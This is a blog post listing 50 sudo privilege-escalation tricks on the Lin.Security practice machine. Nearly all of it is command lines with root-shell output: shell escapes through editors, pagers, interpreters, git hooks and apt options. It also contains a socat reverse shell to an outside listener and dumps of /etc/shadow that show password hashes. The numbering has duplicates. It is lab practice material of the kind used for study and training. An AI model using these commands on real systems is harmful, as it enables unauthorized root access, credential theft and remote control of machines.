
Wednesday, September 1, 2021

LIN_SECURITY - PRIVILEGE ESCALATION - 50 of 100 WAYS - SUDO challenge - SERIES [I]

 





PRIVILEGE ESCALATION SUDO

1. ASH:

bob@linsecurity:~$ sudo ash

# whoami

root

# id

uid=0(root) gid=0(root) groups=0(root)

# ^C

# exit


2. AWK:

bob@linsecurity:~$ sudo awk 'BEGIN {system("/bin/sh")}'

# whoami

root

# id

uid=0(root) gid=0(root) groups=0(root)

# ^C

# exit


3. BASH

bob@linsecurity:~$ sudo /bin/bash

root@linsecurity:~# whoami

root

root@linsecurity:~# id

uid=0(root) gid=0(root) groups=0(root)

root@linsecurity:~# exit

exit


4. CSH:

bob@linsecurity:~$ sudo /bin/csh

# whoami

root

# id

uid=0(root) gid=0(root) groups=0(root)

# exit

# exit

5. DASH:

bob@linsecurity:~$ sudo /bin/dash
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)

6. ED:

bob@linsecurity:~$ sudo /bin/ed
!/bin/sh
# whomai
/bin/sh: 1: whomai: not found
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)

7. ENV:
bob@linsecurity:~$ sudo /usr/bin/env /bin/sh
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)

8. EXPECT:
sudo /usr/bin/expect -c 'spawn /bin/sh; interact'
[sudo] password for bob: 
spawn /bin/sh
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)

9. FIND:
bob@linsecurity:~$ sudo find . -exec /bin/sh \; -quit
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)

10. FTP:
bob@linsecurity:~$ sudo ftp
ftp> !/bin/sh
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)

11. LESS:
bob@linsecurity:~$ sudo /usr/bin/less /etc/profile (write at the end of file !/bin/sh)
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)

12. MAN:
bob@linsecurity:~$ sudo /usr/bin/man man (write at the end of file !/bin/sh)
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)

13. MORE:
bob@linsecurity:~$ TERM= sudo more /etc/profile
[sudo] password for bob: 
# /etc/profile: system-wide .profile file for the Bourne shell (sh(1))
# and Bourne compatible shells (bash(1), ksh(1), ash(1), ...).

if [ "${PS1-}" ]; then
  if [ "${BASH-}" ] && [ "$BASH" != "/bin/sh" ]; then
    # The file bash.bashrc already sets the default PS1.
    # PS1='\h:\w\$ '
    if [ -f /etc/bash.bashrc ]; then
      . /etc/bash.bashrc
    fi
  else
    if [ "`id -u`" -eq 0 ]; then
      PS1='# '
    else
      PS1='$ '
    fi
  fi
fi

if [ -d /etc/profile.d ]; then
  for i in /etc/profile.d/*.sh; do
    if [ -r $i ]; then
      . $i
!/bin/sh     
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)

14. SCP:
bob@linsecurity:~$ TF=$(mktemp)
bob@linsecurity:~$ echo 'sh 0<&2 1>&2' > $TF
bob@linsecurity:~$ chmod +x "$TF"
bob@linsecurity:~$ sudo scp -S $TF x y:
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)

15. SOCAT:

bob@linsecurity:~$ RHOST=192.168.1.34
bob@linsecurity:~$ RPORT=12345

bob@linsecurity:~$ /usr/bin/socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane

kali@kali:~$ socat file:`tty`,raw,echo=0 tcp-listen:12345 
/bin/sh: 0: can't access tty; job control turned off
$ whoami
bob
$ id
uid=1000(bob) gid=1004(bob) groups=1004(bob)



16. SSH:

bob@linsecurity:~$ sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)

17. VI:

sudo /usr/bin/vi .     
~
:!/bin/sh                                                                                                                                             
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)

18. ZSH:

bob@linsecurity:~$ sudo /usr/bin/zsh
linsecurity# whoami                                                                                                                                                              
root
linsecurity# id                                                                                                                                                                  
uid=0(root) gid=0(root) groups=0(root)
linsecurity#          

17. PICO (not validated):

sudo pico
^R^X
reset; sh 1>&0 2>&0

18. RVIM:
bob@linsecurity:~$ sudo /usr/bin/rvim -c ':py3 import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

19. PERL:

bob@linsecurity:~$ sudo perl -e 'exec "/bin/sh";'
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)

20. TCLSH

bob@linsecurity:~$ sudo /usr/bin/tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr% 
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)

21.GIT: 1

bob@linsecurity:~$ sudo git -p help config

!/bin/sh
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)

22. GIT: 2

bob@linsecurity:~$ sudo git branch --help config
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)


23. GIT: 3

bob@linsecurity:~$ sudo git config --global user.email "test@test"
bob@linsecurity:~$ sudo git config --global user.name "test@test"

bob@linsecurity:~$ TF=$(mktemp -d)
bob@linsecurity:~$ git init "$TF"
Initialized empty Git repository in /tmp/tmp.7NvZuCf2bk/.git/
bob@linsecurity:~$ echo 'exec /bin/sh 0<&2 1>&2' >"$TF/.git/hooks/pre-commit.sample"
bob@linsecurity:~$ mv "$TF/.git/hooks/pre-commit.sample" "$TF/.git/hooks/pre-commit"
bob@linsecurity:~$ sudo git -C "$TF" commit --allow-empty -m x


bob@linsecurity:~$ sudo git -C "$TF" commit --allow-empty -m x
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)

24. GIT: 4

bob@linsecurity:~$ TF=$(mktemp -d)
bob@linsecurity:~$ ln -s /bin/sh "$TF/git-x"
bob@linsecurity:~$ sudo git "--exec-path=$TF" x
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)


25. SCRIPT: 

bob@linsecurity:~$ sudo script -q /dev/null
root@linsecurity:~# whoami
root
root@linsecurity:~# id
uid=0(root) gid=0(root) groups=0(root)
root@linsecurity:~# 

26. AR:

TF=$(mktemp -u)
LFILE=file_to_read
sudo ar r "$TF" "$LFILE"
cat "$TF"

27. APT: 1
bob@linsecurity:~$ sudo apt-get changelog apt
Get:1 https://changelogs.ubuntu.com apt 1.6.14 Changelog [452 kB]
Fetched 452 kB in 1s (451 kB/s)
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# 

28. APT: 2

bob@linsecurity:~$ TF=$(mktemp)
bob@linsecurity:~$ echo 'Dpkg::Pre-Invoke {"/bin/sh;false"}' > $TF
bob@linsecurity:~$ sudo apt install -c $TF sl
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following packages were automatically installed and are no longer required:
  libfile-copy-recursive-perl linux-headers-4.15.0-20 linux-headers-4.15.0-20-generic linux-image-4.15.0-20-generic linux-modules-4.15.0-20-generic
  linux-modules-extra-4.15.0-20-generic tcpd update-inetd
Use 'sudo apt autoremove' to remove them.
The following NEW packages will be installed:
  sl
0 upgraded, 1 newly installed, 0 to remove and 144 not upgraded.
Need to get 26.4 kB of archives.
After this operation, 98.3 kB of additional disk space will be used.
Get:1 http://archive.ubuntu.com/ubuntu bionic/universe amd64 sl amd64 3.03-17build2 [26.4 kB]
Fetched 26.4 kB in 0s (172 kB/s)
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)

29. APT: 3

bob@linsecurity:~$ sudo apt update -o APT::Update::Pre-Invoke::=/bin/sh
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)


30. APT-GET: 1

bob@linsecurity:~$ sudo apt-get changelog apt
Get:1 https://changelogs.ubuntu.com apt 1.6.14 Changelog [452 kB]
Fetched 452 kB in 1s (489 kB/s)
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)

31. APT-GET: 2

bob@linsecurity:~$ TF=$(mktemp)
bob@linsecurity:~$ echo 'Dpkg::Pre-Invoke {"/bin/sh;false"}' > $TF
bob@linsecurity:~$ sudo apt-get install -c $TF sl
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following packages were automatically installed and are no longer required:
  libfile-copy-recursive-perl linux-headers-4.15.0-20 linux-headers-4.15.0-20-generic linux-image-4.15.0-20-generic linux-modules-4.15.0-20-generic
  linux-modules-extra-4.15.0-20-generic tcpd update-inetd
Use 'sudo apt autoremove' to remove them.
The following NEW packages will be installed:
  sl
0 upgraded, 1 newly installed, 0 to remove and 144 not upgraded.
Need to get 0 B/26.4 kB of archives.
After this operation, 98.3 kB of additional disk space will be used.
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# exit
E: Problem executing scripts DPkg::Pre-Invoke '/bin/sh;false'
E: Sub-process returned an error code


32. APT-GET: 3

bob@linsecurity:~$ sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
# whoami 
root
# id
uid=0(root) gid=0(root) groups=0(root)
# exit
Hit:1 https://download.docker.com/linux/ubuntu bionic InRelease
Hit:2 http://archive.ubuntu.com/ubuntu bionic InRelease                                               
Hit:3 http://archive.ubuntu.com/ubuntu bionic-updates InRelease                                       
Get:4 http://archive.ubuntu.com/ubuntu bionic-backports InRelease [74.6 kB]                           
Hit:5 http://security.ubuntu.com/ubuntu bionic-security InRelease                   
Fetched 74.6 kB in 0s (207 kB/s)                               
Reading package lists... Done


33. ARP:

bob@linsecurity:~$ LFILE=/etc/sudoers
bob@linsecurity:~$ sudo /usr/sbin/arp -v -f "$LFILE"
>> #
>> # This file MUST be edited with the 'visudo' command as root.
>> #
>> # Please consider adding local content in /etc/sudoers.d/ instead of
>> # directly modifying this file.
>> #
>> # See the man page for details on how to write a sudoers file.
>> #
>> Defaults  env_reset
Defaults: Host name lookup failure
arp: cannot set entry on line 9 of etherfile /etc/sudoers !
>> Defaults  mail_badpass
Defaults: Host name lookup failure
arp: cannot set entry on line 10 of etherfile /etc/sudoers !
>> Defaults  secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
Defaults: Host name lookup failure
arp: cannot set entry on line 11 of etherfile /etc/sudoers !
>> 
>> # Host alias specification
>> 
>> # User alias specification
>> 
>> # Cmnd alias specification
>> Cmnd_Alias STRACE = /usr/bin/strace
Cmnd_Alias: Host name lookup failure
arp: cannot set entry on line 18 of etherfile /etc/sudoers !
>> Cmnd_Alias ALLTHETHINGS = /bin/su, /usr/bin/apt, /usr/bin/apt-get, /usr/bin/ar, /usr/sbin/arp, /bin/ash, /usr/bin/awk, /bin/bash, /bin/sh, /bin/csh, /usr/bin/curl, /bin/dash, /bin/ed, /usr/bin/env, /usr/bin/expect, /usr/bin/find, /usr/bin/ftp, /usr/bin/less, /usr/bin/man, /bin/more, /usr/bin/scp, /usr/bin/socat, /usr/bin/ssh, /usr/bin/vi, /usr/bin/zsh, /usr/bin/pico, /usr/bin/rvim, /usr/bin/perl, /usr/bin/tclsh, /usr/bin/git, /usr/bin/script, /usr/bin/scp
Cmnd_Alias: Host name lookup failure


34. SU:

bob@linsecurity:~$ sudo su
root@linsecurity:/home/bob# whoami
root
root@linsecurity:/home/bob# id
uid=0(root) gid=0(root) groups=0(root)
root@linsecurity:/home/bob# 

35. AT:

bob@linsecurity:~$ echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | sudo at now; tail -f /dev/null
warning: commands will be executed using /bin/sh
job 1 at Wed Sep  1 16:21:00 2021
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)

36. BASE32:

bob@linsecurity:~$ LFILE=/etc/shadow
bob@linsecurity:~$ sudo base32 "$LFILE" | base32 --decode
root:$6$aorWKpxj$yOgku4F1ZRbqvSxxUtAYY2/6K/UU5wLobTSz/Pw5/ILvXgq9NibQ0/NQbOr1Wzp2bTbpNQr1jNNlaGjXDu5Yj1:17721:0:99999:7:::
daemon:*:17647:0:99999:7:::
bin:*:17647:0:99999:7:::
sys:*:17647:0:99999:7:::
sync:*:17647:0:99999:7:::
games:*:17647:0:99999:7:::
man:*:17647:0:99999:7:::
lp:*:17647:0:99999:7:::
mail:*:17647:0:99999:7:::
news:*:17647:0:99999:7:::
uucp:*:17647:0:99999:7:::
proxy:*:17647:0:99999:7:::
www-data:*:17647:0:99999:7:::
backup:*:17647:0:99999:7:::
list:*:17647:0:99999:7:::
irc:*:17647:0:99999:7:::
gnats:*:17647:0:99999:7:::
nobody:*:17647:0:99999:7:::
systemd-network:*:17647:0:99999:7:::
systemd-resolve:*:17647:0:99999:7:::
syslog:*:17647:0:99999:7:::
messagebus:*:17647:0:99999:7:::
_apt:*:17647:0:99999:7:::
lxd:*:17647:0:99999:7:::
uuidd:*:17647:0:99999:7:::
dnsmasq:*:17647:0:99999:7:::
landscape:*:17647:0:99999:7:::
pollinate:*:17647:0:99999:7:::
sshd:*:17647:0:99999:7:::
bob:$6$Kk0DA.6Xha4nL2p5$jq7qoit2l4ckULg1ZxcbL5wUz2Ld2ZUa.RYaIMs.Lma0EFGheX9yCXfKy37K0GsHz50FYIqIESo4QXWL.DYTI0:17721:0:99999:7:::
statd:*:17721:0:99999:7:::
peter:$6$QpjS4vUG$Zi1KcJ7cRB8TJG9A/x7GhQQvJ0RoYwG4Jxj/6R58SJddU2X/QTQKNJWzwiByeTELKeyp0vS83kPsYITbTTmlb0:17721:0:99999:7:::
susan:$6$5oSmml7K$0joeavcuzw4qxDJ2LsD1ablUIrFhycVoIXL3rxN/3q2lVpQOKLufta5tqMRIh30Gb32IBp5yZ7XvBR6uX9/SR/:17721:0:99999:7:::


37. BASE64:

bob@linsecurity:~$ LFILE=/etc/shadow
bob@linsecurity:~$ sudo base64 "$LFILE" | base64 --decode
root:$6$aorWKpxj$yOgku4F1ZRbqvSxxUtAYY2/6K/UU5wLobTSz/Pw5/ILvXgq9NibQ0/NQbOr1Wzp2bTbpNQr1jNNlaGjXDu5Yj1:17721:0:99999:7:::
daemon:*:17647:0:99999:7:::
bin:*:17647:0:99999:7:::
sys:*:17647:0:99999:7:::
sync:*:17647:0:99999:7:::
games:*:17647:0:99999:7:::
man:*:17647:0:99999:7:::
lp:*:17647:0:99999:7:::
mail:*:17647:0:99999:7:::
news:*:17647:0:99999:7:::
uucp:*:17647:0:99999:7:::
proxy:*:17647:0:99999:7:::
www-data:*:17647:0:99999:7:::
backup:*:17647:0:99999:7:::
list:*:17647:0:99999:7:::
irc:*:17647:0:99999:7:::
gnats:*:17647:0:99999:7:::
nobody:*:17647:0:99999:7:::
systemd-network:*:17647:0:99999:7:::
systemd-resolve:*:17647:0:99999:7:::
syslog:*:17647:0:99999:7:::
messagebus:*:17647:0:99999:7:::
_apt:*:17647:0:99999:7:::
lxd:*:17647:0:99999:7:::
uuidd:*:17647:0:99999:7:::
dnsmasq:*:17647:0:99999:7:::
landscape:*:17647:0:99999:7:::
pollinate:*:17647:0:99999:7:::
sshd:*:17647:0:99999:7:::
bob:$6$Kk0DA.6Xha4nL2p5$jq7qoit2l4ckULg1ZxcbL5wUz2Ld2ZUa.RYaIMs.Lma0EFGheX9yCXfKy37K0GsHz50FYIqIESo4QXWL.DYTI0:17721:0:99999:7:::
statd:*:17721:0:99999:7:::
peter:$6$QpjS4vUG$Zi1KcJ7cRB8TJG9A/x7GhQQvJ0RoYwG4Jxj/6R58SJddU2X/QTQKNJWzwiByeTELKeyp0vS83kPsYITbTTmlb0:17721:0:99999:7:::
susan:$6$5oSmml7K$0joeavcuzw4qxDJ2LsD1ablUIrFhycVoIXL3rxN/3q2lVpQOKLufta5tqMRIh30Gb32IBp5yZ7XvBR6uX9/SR/:17721:0:99999:7:::


38. STRACE:

bob@linsecurity:~$ sudo strace -o /dev/null /bin/sh
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)


39. BRIDGE:

root@linsecurity:/home/bob# echo mysecretdata > test
root@linsecurity:/home/bob# exit
exit
bob@linsecurity:~$ LFILE=test
bob@linsecurity:~$ sudo bridge -b "$LFILE"
Object "mysecretdata" is unknown, try "bridge help".
Command failed test:1
bob@linsecurity:~$ 


40. BUSCTL:

sudo busctl --show-machine
!/bin/sh

41. BUSYBOX:
bob@linsecurity:~$ sudo busybox sh


BusyBox v1.27.2 (Ubuntu 1:1.27.2-2ubuntu3.3) built-in shell (ash)
Enter 'help' for a list of built-in commands.

/home/bob # whoami
root
/home/bob # id
uid=0(root) gid=0(root) groups=0(root)
/home/bob # 


42. C89:

bob@linsecurity:~$ sudo c89 -wrapper /bin/sh,-s .
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# ^C
# ^C


43. C99:

bob@linsecurity:~$ sudo c99 -wrapper /bin/sh,-s .
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)


44. CAPSH:

bob@linsecurity:~$ sudo capsh --
root@linsecurity:~# whoami
root
root@linsecurity:~# id
uid=0(root) gid=0(root) groups=0(root)
root@linsecurity:~# 

45. CAT:

bob@linsecurity:~$ ls -ltrh test
-rw-r--r-- 1 root root 13 Sep  1 16:32 test
bob@linsecurity:~$ LFILE=test
bob@linsecurity:~$ sudo cat $LFILE
mysecretdata
bob@linsecurity:~$ 


46. CHMOD:

bob@linsecurity:~$ ls -ltrh test
-rw-r--r-- 1 root root 13 Sep  1 16:32 test
bob@linsecurity:~$ LFILE=test
bob@linsecurity:~$ sudo chmod 6777 $LFILE
bob@linsecurity:~$ cat $LFILE
mysecretdata
bob@linsecurity:~$ echo "more data " >>test
bob@linsecurity:~$ ls -ltrh test
-rwxrwxrwx 1 root root 24 Sep  1 16:43 test


47. CHOWN:

bob@linsecurity:~$ ls -ltrh test
-rwxrwxrwx 1 root root 24 Sep  1 16:43 test
bob@linsecurity:~$ sudo chown $(id -un):$(id -gn) $LFILE
bob@linsecurity:~$ ls -ltrh test
-rwxrwxrwx 1 bob bob 24 Sep  1 16:43 test


48. CHROOT:

bob@linsecurity:~$ sudo chroot /
root@linsecurity:/# whoami
root
root@linsecurity:/# id
uid=0(root) gid=0(root) groups=0(root)


49. CMP:


bob@linsecurity:~$ ls -ltrh file_root 
-rw-r--r-- 1 root root 5 Sep  1 16:47 file_root
bob@linsecurity:~$ LFILE=file_root
bob@linsecurity:~$ sudo cmp $LFILE /dev/zero -b -l
1 150 h      0 ^@
2 141 a      0 ^@
3 162 r      0 ^@
4 144 d      0 ^@
5  12 ^J     0 ^@
cmp: EOF on file_root after byte 5
bob@linsecurity:~$ sudo cat $LFILE
hard

50. COLUMN:

bob@linsecurity:~$ ls -ltrh $LFILE
-rw-r--r-- 1 root root 5 Sep  1 16:47 file_root
bob@linsecurity:~$ sudo column $LFILE
hard
bob@linsecurity:~$ 




